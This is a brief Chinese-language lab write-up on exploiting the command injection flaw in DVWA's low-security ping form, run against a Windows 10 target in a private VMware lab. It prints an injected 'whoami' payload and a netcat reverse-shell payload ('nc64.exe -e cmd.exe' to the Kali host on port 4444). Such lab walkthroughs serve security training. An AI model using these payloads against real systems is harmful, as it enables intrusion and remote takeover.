本节讲述了DVWA的命令注入漏洞,并通过对这个漏洞的利用,获取靶机的shell,完成入侵。
1.场景
虚拟机:vmware
攻击主机:kali
IP:192.168.239.142
靶机:Windows10
IP:192.168.239.1
服务:xampp启动的DVWA
2.DVWA 命令注入漏洞简介
DVWA中命令注入模块是一个ping命令的执行,
查看源码(此处为了理解漏洞,只学习low级别源码)
对输入没有进行任何过滤。
3.漏洞利用
尝试读取low.php,在输入框框输入
192.168.239.1&&whoami
whoami命令执行。
靶机windows10上装过nc,所以可以通过靶机的nc,获取靶机的shell。
现在kali上开启nc监听4444端口,然后在DVWA上输入以下payload点击submit提交。
192.168.239.1&& nc64.exe -e cmd.exe 192.168.239.142 4444
完成,kali获取了windows10的shell!